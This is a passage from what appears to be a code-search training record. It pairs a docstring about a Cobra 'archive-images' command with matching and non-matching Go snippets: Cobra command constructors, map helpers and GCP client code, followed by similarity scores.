= false\n\t\t\tfor _, mk := range keyMap {\n\t\t\t\tif k == mk {\n\t\t\t\t\tdidFind = true\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\t\t\tif !didFind {\n\t\t\t\tkeyMap = append(keyMap, k)\n\t\t\t}\n\t\t\tdidFind = false\n\n\t\t\tswitch vt := v.(type) {\n\t\t\tdefault:\n\t\t\t\tif vt == nil {\n\t\t\t\t\t// ignore nil types\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\treturn keyMap, valMap, fmt.Errorf(\"unsupported type for value(%v) with key(%v) in tags for feature %v.\", vt, k, f)\n\n\t\t\tcase string:\n\t\t\t\tfor _, mv := range valMap {\n\t\t\t\t\ttmv, ok := mv.(string)\n\t\t\t\t\tif !ok {\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t}\n\t\t\t\t\tif tmv == vt {\n\t\t\t\t\t\tdidFind = true\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\tcase fmt.Stringer:\n\t\t\t\tfor _, mv := range valMap {\n\t\t\t\t\ttmv, ok := mv.(fmt.Stringer)\n\t\t\t\t\tif !ok {\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t}\n\t\t\t\t\tif tmv.String() == vt.String() {\n\t\t\t\t\t\tdidFind = true\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\tcase int:\n\t\t\t\tfor _, mv := range valMap {\n\t\t\t\t\ttmv, ok := mv.(int)\n\t\t\t\t\tif !ok {\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t}\n\t\t\t\t\tif tmv == vt {\n\t\t\t\t\t\tdidFind = true\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\tcase int8:\n\t\t\t\tfor _, mv := range valMap {\n\t\t\t\t\ttmv, ok := mv.(int8)\n\t\t\t\t\tif !ok {\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t}\n\t\t\t\t\tif tmv == vt {\n\t\t\t\t\t\tdidFind = true\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\tcase int16:\n\t\t\t\tfor _, mv := range valMap {\n\t\t\t\t\ttmv, ok := mv.(int16)\n\t\t\t\t\tif !ok {\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t}\n\t\t\t\t\tif tmv == vt {\n\t\t\t\t\t\tdidFind = true\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\tcase int32:\n\t\t\t\tfor _, mv := range valMap {\n\t\t\t\t\ttmv, ok := mv.(int32)\n\t\t\t\t\tif !ok {\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t}\n\t\t\t\t\tif tmv == vt {\n\t\t\t\t\t\tdidFind = true\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\tcase int64:\n\t\t\t\tfor _, mv := range valMap {\n\t\t\t\t\ttmv, ok := mv.(int64)\n\t\t\t\t\tif !ok {\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t}\n\t\t\t\t\tif tmv == vt {\n\t\t\t\t\t\tdidFind = true\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\tcase uint:\n\t\t\t\tfor _, mv := range valMap {\n\t\t\t\t\ttmv, ok := mv.(uint)\n\t\t\t\t\tif !ok {\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t}\n\t\t\t\t\tif tmv == vt {\n\t\t\t\t\t\tdidFind = true\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\tcase uint8:\n\t\t\t\tfor _, mv := range valMap {\n\t\t\t\t\ttmv, ok := mv.(uint8)\n\t\t\t\t\tif !ok {\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t}\n\t\t\t\t\tif tmv == vt {\n\t\t\t\t\t\tdidFind = true\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\tcase uint16:\n\t\t\t\tfor _, mv := range valMap {\n\t\t\t\t\ttmv, ok := mv.(uint16)\n\t\t\t\t\tif !ok {\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t}\n\t\t\t\t\tif tmv == vt {\n\t\t\t\t\t\tdidFind = true\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\tcase uint32:\n\t\t\t\tfor _, mv := range valMap {\n\t\t\t\t\ttmv, ok := mv.(uint32)\n\t\t\t\t\tif !ok {\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t}\n\t\t\t\t\tif tmv == vt {\n\t\t\t\t\t\tdidFind = true\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\tcase uint64:\n\t\t\t\tfor _, mv := range valMap {\n\t\t\t\t\ttmv, ok := mv.(uint64)\n\t\t\t\t\tif !ok {\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t}\n\t\t\t\t\tif tmv == vt {\n\t\t\t\t\t\tdidFind = true\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\tcase float32:\n\t\t\t\tfor _, mv := range valMap {\n\t\t\t\t\ttmv, ok := mv.(float32)\n\t\t\t\t\tif !ok {\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t}\n\t\t\t\t\tif tmv == vt {\n\t\t\t\t\t\tdidFind = true\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\tcase float64:\n\t\t\t\tfor _, mv := range valMap {\n\t\t\t\t\ttmv, ok := mv.(float64)\n\t\t\t\t\tif !ok {\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t}\n\t\t\t\t\tif tmv == vt {\n\t\t\t\t\t\tdidFind = true\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\tcase bool:\n\t\t\t\tfor _, mv := range valMap {\n\t\t\t\t\ttmv, ok := mv.(bool)\n\t\t\t\t\tif !ok {\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t}\n\t\t\t\t\tif tmv == vt {\n\t\t\t\t\t\tdidFind = true\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t} // value type switch\n\n\t\t\tif !didFind {\n\t\t\t\tvalMap = append(valMap, v)\n\t\t\t}\n\n\t\t} // For f.Tags\n\t} // for features\n\treturn keyMap, valMap, nil\n}", "func IntSlice(k string, v []int) KeyValue {\n\treturn Key(k).IntSlice(v)\n}", "func flattenKeyTestingOptionsMap(c *Client, i interface{}, res *Key) map[string]KeyTestingOptions {\n\ta, ok := i.(map[string]interface{})\n\tif !ok {\n\t\treturn map[string]KeyTestingOptions{}\n\t}\n\n\tif len(a) == 0 {\n\t\treturn map[string]KeyTestingOptions{}\n\t}\n\n\titems := make(map[string]KeyTestingOptions)\n\tfor k, item := range a {\n\t\titems[k] = *flattenKeyTestingOptions(c, item.(map[string]interface{}), res)\n\t}\n\n\treturn items\n}", "func addNewKeys(existing map[string]interface{}, newKeys []string) {\n\tfor _, n := range newKeys {\n\t\tif _, ok := existing[n]; !ok {\n\t\t\texisting[n] = true\n\t\t}\n\t}\n}", "func (fn *formulaFuncs) kth(name string, argsList *list.List) formulaArg {\n\tif argsList.Len() != 2 {\n\t\treturn newErrorFormulaArg(formulaErrorVALUE, fmt.Sprintf(\"%s requires 2 arguments\", name))\n\t}\n\tarray := argsList.Front().Value.(formulaArg).ToList()\n\targK := argsList.Back().Value.(formulaArg).ToNumber()\n\tif argK.Type != ArgNumber {\n\t\treturn argK\n\t}\n\tk := int(argK.Number)\n\tif k < 1 {\n\t\treturn newErrorFormulaArg(formulaErrorNUM, \"k should be > 0\")\n\t}\n\tvar data []float64\n\tfor _, arg := range array {\n\t\tif arg.Type == ArgNumber {\n\t\t\tdata = append(data, arg.Number)\n\t\t}\n\t}\n\tif len(data) < k {\n\t\treturn newErrorFormulaArg(formulaErrorNUM, \"k should be <= length of array\")\n\t}\n\tsort.Float64s(data)\n\tif name == \"LARGE\" {\n\t\treturn newNumberFormulaArg(data[len(data)-k])\n\t}\n\treturn newNumberFormulaArg(data[k-1])\n}", "func expandImageImageEncryptionKeyMap(c *Client, f map[string]ImageImageEncryptionKey) (map[string]interface{}, error) {\n\tif f == nil {\n\t\treturn nil, nil\n\t}\n\n\titems := make(map[string]interface{})\n\tfor k, item := range f {\n\t\ti, err := expandImageImageEncryptionKey(c, &item)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif i != nil {\n\t\t\titems[k] = i\n\t\t}\n\t}\n\n\treturn items, nil\n}", "func Extend(target map[string]interface{}, args ...interface{}) (map[string]interface{}, error) {\n\tif len(args)%2 != 0 {\n\t\treturn nil, fmt.Errorf(\"expecting even number of arguments, got %d\", len(args))\n\t}\n\n\tfn := \"\"\n\tfor _, v := range args {\n\t\tif len(fn) == 0 {\n\t\t\tif s, ok := v.(string); ok {\n\t\t\t\tfn = s\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\treturn target, fmt.Errorf(\"expecting string for odd numbered arguments, got %+v\", v)\n\t\t}\n\t\ttarget[fn] = v\n\t\tfn = \"\"\n\t}\n\n\treturn target, nil\n}", "func newParsedArgs(original map[string]interface{}, newFilename string) map[string]interface{} {\n\tout := make(map[string]interface{})\n\tfor k, v := range original {\n\t\tout[k] = v\n\t}\n\tout[\"--filename\"] = newFilename\n\treturn out\n}", "func expandKeyAndroidSettingsMap(c *Client, f map[string]KeyAndroidSettings, res *Key) (map[string]interface{}, error) {\n\tif f == nil {\n\t\treturn nil, nil\n\t}\n\n\titems := make(map[string]interface{})\n\tfor k, item := range f {\n\t\ti, err := expandKeyAndroidSettings(c, &item, res)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif i != nil {\n\t\t\titems[k] = i\n\t\t}\n\t}\n\n\treturn items, nil\n}", "func InfoKV(ctx context.Context, msg string, args ...field.Field) {\n\tglobal.InfoKV(ctx, msg, args...)\n}", "func flattenKey(c *Client, i interface{}, res *Key) *Key {\n\tm, ok := i.(map[string]interface{})\n\tif !ok {\n\t\treturn nil\n\t}\n\tif len(m) == 0 {\n\t\treturn nil\n\t}\n\n\tresultRes := &Key{}\n\tresultRes.Name = dcl.SelfLinkToName(dcl.FlattenString(m[\"name\"]))\n\tresultRes.DisplayName = dcl.FlattenString(m[\"displayName\"])\n\tresultRes.WebSettings = flattenKeyWebSettings(c, m[\"webSettings\"], res)\n\tresultRes.AndroidSettings = flattenKeyAndroidSettings(c, m[\"androidSettings\"], res)\n\tresultRes.IosSettings = flattenKeyIosSettings(c, m[\"iosSettings\"], res)\n\tresultRes.Labels = dcl.FlattenKeyValuePairs(m[\"labels\"])\n\tresultRes.CreateTime = dcl.FlattenString(m[\"createTime\"])\n\tresultRes.TestingOptions = flattenKeyTestingOptions(c, m[\"testingOptions\"], res)\n\tresultRes.Project = dcl.FlattenString(m[\"project\"])\n\n\treturn resultRes\n}", "func ParamsMultiValueGet(params map[string][]string, key string) ([]string, error) {\n values := params[key]\n \n if values == nil || len(values) == 0 {\n return nil, errors.New(\"key not exist\")\n }\n\n return values, nil\n}", "func KeyMatchFunc(args ...interface{}) (interface{}, error) {\n\tname1 := args[0].(string)\n\tname2 := args[1].(string)\n\n\treturn (bool)(KeyMatch(name1, name2)), nil\n}", "func (r Args) Get(key string) interface{} {\n\treturn r[key]\n}", "func Entries[K comparable, V any](in map[K]V) []Entry[K, V] {\n\tentries := make([]Entry[K, V], 0, len(in))\n\n\tfor k, v := range in {\n\t\tentries = append(entries, Entry[K, V]{\n\t\t\tKey: k,\n\t\t\tValue: v,\n\t\t})\n\t}\n\n\treturn entries\n}", "func SKey(key ...string) Key {\n\tout := make(Key, 0, len(key))\n\tfor _, k := range key {\n\t\tout = append(out, values.String(k))\n\t}\n\treturn out\n}", "func ShouldContainKey(actual interface{}, expected ...interface{}) error {\n\tif err := need(1, expected); err != nil {\n\t\treturn err\n\t}\n\tactualMap, err := cast.ToStringMapE(actual)\n\tif err != nil {\n\t\treturn err\n\t}\n\tfor k := range actualMap {\n\t\tif ShouldEqual(k, expected[0]) == nil {\n\t\t\treturn nil\n\t\t}\n\t}\n\treturn fmt.Errorf(\"expected '%v' contain key %v but it wasnt\", actual, expected[0])\n}", "func PutMulti(c appengine.Context, key []*Key, src []interface{}) ([]*Key, os.Error) {\n\tif len(key) != len(src) {\n\t\treturn nil, os.NewError(\"datastore: key and src slices have different length\")\n\t}\n\tif len(key) == 0 {\n\t\treturn nil, nil\n\t}\n\tappID := c.FullyQualifiedAppID()\n\tif err := multiValid(key); err != nil {\n\t\treturn nil, err\n\t}\n\treq := &pb.PutRequest{}\n\tfor i, sIface := range src {\n\t\tif m, ok := sIface.(Map); ok {\n\t\t\tsProto, err := saveMap(appID, key[i], m)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t\treq.Entity = append(req.Entity, sProto)\n\t\t} else {\n\t\t\tsv, err := asStructValue(sIface)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t\tsProto, err := saveStruct(appID, key[i], sv)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t\treq.Entity = append(req.Entity, sProto)\n\t\t}\n\t}\n\tres := &pb.PutResponse{}\n\terr := c.Call(\"datastore_v3\", \"Put\", req, res)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif len(key) != len(res.Key) {\n\t\treturn nil, os.NewError(\"datastore: internal error: server returned the wrong number of keys\")\n\t}\n\tret := make([]*Key, len(key))\n\tfor i := range ret {\n\t\tret[i], err = protoToKey(res.Key[i])\n\t\tif err != nil || ret[i].Incomplete() {\n\t\t\treturn nil, os.NewError(\"datastore: internal error: server returned an invalid key\")\n\t\t}\n\t}\n\treturn ret, nil\n}", "func newUpdateKeyUpdateKeyRequest(ctx context.Context, f *Key, c *Client) (map[string]interface{}, error) {\n\treq := map[string]interface{}{}\n\tres := f\n\t_ = res\n\n\tif v := f.DisplayName; !dcl.IsEmptyValueIndirect(v) {\n\t\treq[\"displayName\"] = v\n\t}\n\tif v, err := expandKeyWebSettings(c, f.WebSettings, res); err != nil {\n\t\treturn nil, fmt.Errorf(\"error expanding WebSettings into webSettings: %w\", err)\n\t} else if !dcl.IsEmptyValueIndirect(v) {\n\t\treq[\"webSettings\"] = v\n\t}\n\tif v, err := expandKeyAndroidSettings(c, f.AndroidSettings, res); err != nil {\n\t\treturn nil, fmt.Errorf(\"error expanding AndroidSettings into androidSettings: %w\", err)\n\t} else if !dcl.IsEmptyValueIndirect(v) {\n\t\treq[\"androidSettings\"] = v\n\t}\n\tif v, err := expandKeyIosSettings(c, f.IosSettings, res); err != nil {\n\t\treturn nil, fmt.Errorf(\"error expanding IosSettings into iosSettings: %w\", err)\n\t} else if !dcl.IsEmptyValueIndirect(v) {\n\t\treq[\"iosSettings\"] = v\n\t}\n\tif v := f.Labels; !dcl.IsEmptyValueIndirect(v) {\n\t\treq[\"labels\"] = v\n\t}\n\treturn req, nil\n}", "func formatSetValuesAsArgs(setValues map[string]string, flag string) []string {\n\targs := []string{}\n\n\t// To make it easier to test, go through the keys in sorted order\n\tkeys := collections.Keys(setValues)\n\tfor _, key := range keys {\n\t\tvalue := setValues[key]\n\t\targValue := fmt.Sprintf(\"%s=%s\", key, value)\n\t\targs = append(args, flag, argValue)\n\t}\n\n\treturn args\n}", "func equalNilAndEmpty(key, value string, params Parameter) bool {\n if v, ok := params[key]; ok {\n if v == nil {\n return true\n }\n vs := fmt.Sprintf(\"%v\", v)\n return vs == \"\" ||\n vs == \"0\" ||\n (reflect.TypeOf(v).Kind() == reflect.Bool && v.(bool) == false) ||\n vs == \"[]\" ||\n vs == \"map[]\"\n } else {\n return true\n }\n}", "func (e *Variables) buildPaths(keyMap map[string]interface{}) []string {\n\tvar paths []string\n\n\tfor key, item := range keyMap {\n\t\tif reflect.TypeOf(item).Kind() != reflect.Map {\n\t\t\tpaths = append(paths, key)\n\t\t\tcontinue\n\t\t}\n\n\t\tsubMap := item.(map[string]interface{})\n\n\t\tsubPaths := e.buildPaths(subMap)\n\t\tfor _, path := range subPaths {\n\t\t\tpaths = append(paths, fmt.Sprintf(\"%s.%s\", key, path))\n\t\t}\n\t}\n\n\treturn paths\n}", "func KORD(k, k1, k2 operand.Op) { ctx.KORD(k, k1, k2) }", "func MapKVs(m interface{}) (interface{}, interface{}) {\n\tv := vof(m)\n\tfailP1OnErrWhen(v.Kind() != reflect.Map, \"%v\", fEf(\"PARAM_INVALID_MAP\"))\n\n\tkeys := v.MapKeys()\n\tif L := len(keys); L > 0 {\n\t\tkType := tof(keys[0].Interface())\n\t\tkRst := mkSlc(sof(kType), L, L)\n\t\tvType := tof(v.MapIndex(keys[0]).Interface())\n\t\tvRst := mkSlc(sof(vType), L, L)\n\t\tfor i, k := range keys {\n\t\t\tkRst.Index(i).Set(vof(k.Interface()))\n\t\t\tvRst.Index(i).Set(vof(v.MapIndex(k).Interface()))\n\t\t}\n\t\treturn kRst.Interface(), vRst.Interface()\n\t}\n\treturn nil, nil\n}", "func ErrKV(ctx context.Context, msg string, args ...field.Field) {\n\tglobal.ErrKV(ctx, msg, args...)\n}", "func TestHashMapGet(t *T) {\n\tkvs := []*KV{\n\t\tKeyVal(1, \"one\"),\n\t\tKeyVal(2, \"two\"),\n\t}\n\n\t// Degenerate case\n\tm := NewHashMap()\n\tassert.Equal(t, 0, Size(m))\n\tv, ok := m.Get(1)\n\tassert.Equal(t, nil, v)\n\tassert.Equal(t, false, ok)\n\n\tm = NewHashMap(kvs...)\n\tv, ok = m.Get(1)\n\tassertSeqContentsHashMap(t, kvs, m)\n\tassert.Equal(t, \"one\", v)\n\tassert.Equal(t, true, ok)\n\n\tv, ok = m.Get(3)\n\tassertSeqContentsHashMap(t, kvs, m)\n\tassert.Equal(t, nil, v)\n\tassert.Equal(t, false, ok)\n}" ]
[ "0.5839336", "0.57674736", "0.5731646", "0.56703365", "0.5626068", "0.55543524", "0.55519485", "0.55415297", "0.5527142", "0.54866767", "0.5426206", "0.53266597", "0.532312", "0.5322524", "0.531861", "0.52980316", "0.52680635", "0.5245168", "0.52369094", "0.52110976", "0.51894975", "0.51862365", "0.51725686", "0.5172068", "0.51654327", "0.5148294", "0.5120401", "0.51009196", "0.50948817", "0.5092044", "0.5092007", "0.50899494", "0.50826836", "0.5073664", "0.50595134", "0.5044115", "0.5042305", "0.5034252", "0.5022278", "0.50057805", "0.50050116", "0.5002544", "0.5001871", "0.497861", "0.49781632", "0.49754548", "0.496352", "0.49630874", "0.49585888", "0.4955782", "0.49530143", "0.49513286", "0.49436182", "0.49382827", "0.49304974", "0.492015", "0.49163625", "0.49150166", "0.49100572", "0.49071458", "0.490602", "0.49037403", "0.4896062", "0.48781985", "0.4874768", "0.48676872", "0.48643667", "0.48542517", "0.48260236", "0.4813244", "0.4811071", "0.48101765", "0.48101175", "0.48044568", "0.48023632", "0.47977716", "0.4797411", "0.47923324", "0.4782372", "0.47764066", "0.4771888", "0.47704238", "0.4770373", "0.4767842", "0.47627378", "0.47624037", "0.47609437", "0.47602805", "0.47585472", "0.4757389", "0.47550967", "0.47415686", "0.4740562", "0.47340688", "0.47311532", "0.47311515", "0.47308424", "0.47256336", "0.47227785", "0.47065452", "0.47038612" ]
0.0
-1
NewCmd returns a cobra.Command for archiving images operations.
func NewCmd() *cobra.Command { cmd := &cobra.Command{ Use: "archive-images", Short: "Export Capact Docker images to a tar archive", Long: "Subcommand for various manifest generation operations", } cmd.AddCommand(NewFromHelmCharts()) return cmd }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func NewCmdCreate(out io.Writer) *cobra.Command {\n\tcf := &run.CreateFlags{}\n\n\tcmd := &cobra.Command{\n\t\tUse: \"create <image>\",\n\t\tShort: \"Create a new VM without starting it\",\n\t\tLong: dedent.Dedent(`\n\t\t\tCreate a new VM by combining the given image and kernel.\n\t\t\tVarious VM tunables can be set during creation by using\n\t\t\tthe flags for this command. The image and kernel are\n\t\t\tmatched by prefix based on their ID and name.\n\t\t\t\n\t\t\tIf the name flag (-n, --name) is not specified,\n\t\t\tthe VM is given a random name. Using the copy files\n\t\t\tflag (-f, --copy-files), additional files can be added to\n\t\t\tthe VM during creation with the syntax /host/path:/vm/path.\n\n\t\t\tExample usage:\n\t\t\t\t$ ignite create my-image my-kernel \\\n\t\t\t\t\t--name my-vm \\\n\t\t\t\t\t--cpus 2 \\\n\t\t\t\t\t--memory 2048 \\\n\t\t\t\t\t--size 6GB\n\t\t`),\n\t\tArgs: cobra.ExactArgs(1),\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\terrutils.Check(func() error {\n\t\t\t\tco, err := cf.NewCreateOptions(loader.NewResLoader(), args[0])\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\n\t\t\t\treturn run.Create(co)\n\t\t\t}())\n\t\t},\n\t}\n\n\taddCreateFlags(cmd.Flags(), cf)\n\treturn cmd\n}", "func NewCommand() *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"add\",\n\t\tShort: \"Adds the image to the scanning service\",\n\t\tLong: \"Adds the image to the scanning service\",\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tif len(args) < 1 {\n\t\t\t\treturn fmt.Errorf(\"Insufficient arguments, retry with the image name as argument\")\n\t\t\t} else if len(args) > 1 {\n\t\t\t\treturn fmt.Errorf(\"Too many arguments, retry with the image name as the only argument\")\n\t\t\t}\n\t\t\tctx := context.Background()\n\t\t\tctx, cancel := context.WithTimeout(ctx, 10*time.Second)\n\t\t\tdefer cancel()\n\n\t\t\terr := anchore.ScanImage(ctx, args[0])\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\treturn nil\n\t\t},\n\t}\n\treturn cmd\n}", "func newManifestCmd(rootParams *rootParameters) *cobra.Command {\n\tmanifestParams := manifestParameters{rootParameters: rootParams}\n\tcmd := &cobra.Command{\n\t\tUse: \"manifest\",\n\t\tShort: \"Manage manifests inside a repository\",\n\t\tLong: newManifestCmdLongMessage,\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tcmd.Help()\n\t\t\treturn nil\n\t\t},\n\t}\n\n\tlistManifestCmd := newManifestListCmd(&manifestParams)\n\tdeleteManifestCmd := newManifestDeleteCmd(&manifestParams)\n\n\tcmd.AddCommand(\n\t\tlistManifestCmd,\n\t\tdeleteManifestCmd,\n\t)\n\tcmd.PersistentFlags().StringVar(&manifestParams.repoName, \"repository\", \"\", \"The repository name\")\n\t// Since the repository will be needed in either subcommand it is marked as a required flag\n\tcmd.MarkPersistentFlagRequired(\"repository\")\n\n\treturn cmd\n}", "func NewCmd(o *Options) *cobra.Command {\n\n\tc := command{\n\t\tCommand: cli.Command{Options: o.Options},\n\t\topts: o,\n\t}\n\n\tcmd := &cobra.Command{\n\t\tUse: \"module <MODULE_IMAGE>\",\n\t\tShort: \"Unpacks an OCI container image module bundled as an from the contents of the given path\",\n\t\tLong: `Use this command to unpack a Kyma module.\n\n### Detailed description\n\nKyma modules are individual components that can be deployed into a Kyma runtime. Modules are built and distributed as OCI container images. \nWith this command, you can unpack the contents of an image so that they can be deployed into a cluster or inspected by developers.\n`,\n\n\t\tRunE: func(_ *cobra.Command, args []string) error { return c.Run(args) },\n\t\tAliases: []string{\"mod\"},\n\t}\n\n\treturn cmd\n}", "func NewImageCommand(rootSettings *environment.AirshipCTLSettings) *cobra.Command {\n\timageRootCmd := &cobra.Command{\n\t\tUse: \"image\",\n\t\tShort: \"Manage ISO image creation\",\n\t\tPersistentPreRun: func(cmd *cobra.Command, args []string) {\n\t\t\tlog.Init(rootSettings.Debug, cmd.OutOrStderr())\n\n\t\t\t// Load or Initialize airship Config\n\t\t\trootSettings.InitConfig()\n\t\t},\n\t}\n\n\timageBuildCmd := NewImageBuildCommand(rootSettings)\n\timageRootCmd.AddCommand(imageBuildCmd)\n\n\treturn imageRootCmd\n}", "func NewCmd(name, fullName string) *cobra.Command {\n\n\taddCmd := newCmdAdd(addRecommendedCommandName, odoutil.GetFullName(fullName, addRecommendedCommandName))\n\n\tvar cmd = &cobra.Command{\n\t\tUse: name,\n\t\tShort: \"Manage services in an environment\",\n\t\tLong: \"Manage services in a GitOps environment where service source repositories are synchronized\",\n\t\tExample: fmt.Sprintf(\"%s\\n%s\\n\\n See sub-commands individually for more examples\",\n\t\t\tfullName, addRecommendedCommandName),\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t},\n\t}\n\n\tcmd.Flags().AddFlagSet(addCmd.Flags())\n\tcmd.AddCommand(addCmd)\n\n\tcmd.Annotations = map[string]string{\"command\": \"main\"}\n\tcmd.SetUsageTemplate(odoutil.CmdUsageTemplate)\n\treturn cmd\n}", "func NewManifestCmd() *cobra.Command {\n\tmanifestCmd := &cobra.Command{\n\t\tUse: \"manifest\",\n\t\tShort: \"Manipulate manifest lists\",\n\t}\n\tmanifestCmd.AddCommand(\n\t\tNewManifestCreateCmd(),\n\t\tNewManifestAnnotateCmd(),\n\t\tNewManifestInspectCmd(),\n\t)\n\n\treturn manifestCmd\n}", "func newCreateCmd() *cobra.Command {\n\tcreateCmd := cobra.Command{\n\t\tUse: \"create\",\n\t\tShort: `Create a new verless object`,\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\treturn cmd.Help()\n\t\t},\n\t}\n\n\tcreateCmd.AddCommand(newCreateProjectCmd())\n\tcreateCmd.AddCommand(newCreateThemeCmd())\n\tcreateCmd.AddCommand(newCreateFile())\n\n\treturn &createCmd\n}", "func NewCmd(f cmdutil.Factory, clusteradmFlags *genericclioptionsclusteradm.ClusteradmFlags, cmFlags *genericclioptionscm.CMFlags, streams genericclioptions.IOStreams) *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"get\",\n\t\tShort: \"get a resource\",\n\t}\n\n\tcmd.AddCommand(clusters.NewCmd(cmFlags, streams))\n\tcmd.AddCommand(credentials.NewCmd(cmFlags, streams))\n\tcmd.AddCommand(machinepools.NewCmd(cmFlags, streams))\n\tcmd.AddCommand(clusteradmgettoken.NewCmd(clusteradmFlags, streams))\n\tcmd.AddCommand(clusterpoolhosts.NewCmd(f, cmFlags, streams))\n\tcmd.AddCommand(clusterclaim.NewCmd(f, cmFlags, streams))\n\tcmd.AddCommand(clusterpools.NewCmd(f, cmFlags, streams))\n\tcmd.AddCommand(config.NewCmd(clusteradmFlags, cmFlags, streams))\n\tcmd.AddCommand(policies.NewCmd(f, cmFlags, streams))\n\n\treturn cmd\n}", "func NewCommand(c *cli.Context) (Command, error) {\n\tconst errtag = \"NewCommand():\"\n\tvar err error\n\n\tvar cmd Command\n\tb := c.GlobalString(\"businesscard\")\n\n\tif b == \"\" {\n\t\targs := c.Args()\n\t\tcmd.repo = args[0]\n\t\tcmd.name, err = getName(cmd.repo)\n\t\tif err != nil {\n\t\t\treturn cmd, errors.Wrap(err, errtag)\n\t\t}\n\t\tcmd.args = args[1:]\n\t} else {\n\t\tcmd.name = b\n\t\tcmd.repo = \"github.com/\" + b + \"/\" + b\n\t}\n\n\treturn cmd, nil\n}", "func NewGenerateCmd(client *registry.HTTPClient) *cobra.Command {\n\tgenerateCmd := &cobra.Command{\n\t\tUse: \"generate\",\n\t\tShort: \"Generate a Lockfile to track image digests\",\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tif err := validateGenerateCmdFlags(cmd); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tenvPath, err := cmd.Flags().GetString(\"env-file\")\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tenvPath = filepath.ToSlash(envPath)\n\t\t\t_ = godotenv.Load(envPath)\n\t\t\twm, err := getDefaultWrapperManager(cmd, client)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tgenerator, err := generate.NewGenerator(cmd)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tlFile, err := os.Create(generator.LockfileName)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tdefer lFile.Close()\n\t\t\tif err := generator.GenerateLockfile(wm, lFile); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\treturn nil\n\t\t},\n\t}\n\tgenerateCmd.Flags().String(\n\t\t\"base-dir\", \".\", \"Top level directory to collect files from\",\n\t)\n\tgenerateCmd.Flags().StringSlice(\n\t\t\"dockerfiles\", []string{}, \"Path to Dockerfiles\",\n\t)\n\tgenerateCmd.Flags().StringSlice(\n\t\t\"compose-files\", []string{}, \"Path to docker-compose files\",\n\t)\n\tgenerateCmd.Flags().StringSlice(\n\t\t\"dockerfile-globs\", []string{}, \"Glob pattern to select Dockerfiles\",\n\t)\n\tgenerateCmd.Flags().StringSlice(\n\t\t\"compose-file-globs\", []string{},\n\t\t\"Glob pattern to select docker-compose files\",\n\t)\n\tgenerateCmd.Flags().Bool(\n\t\t\"dockerfile-recursive\", false, \"Recursively collect Dockerfiles\",\n\t)\n\tgenerateCmd.Flags().Bool(\n\t\t\"compose-file-recursive\", false,\n\t\t\"Recursively collect docker-compose files\",\n\t)\n\tgenerateCmd.Flags().String(\n\t\t\"lockfile-name\", \"docker-lock.json\",\n\t\t\"Lockfile name to be output in the current working 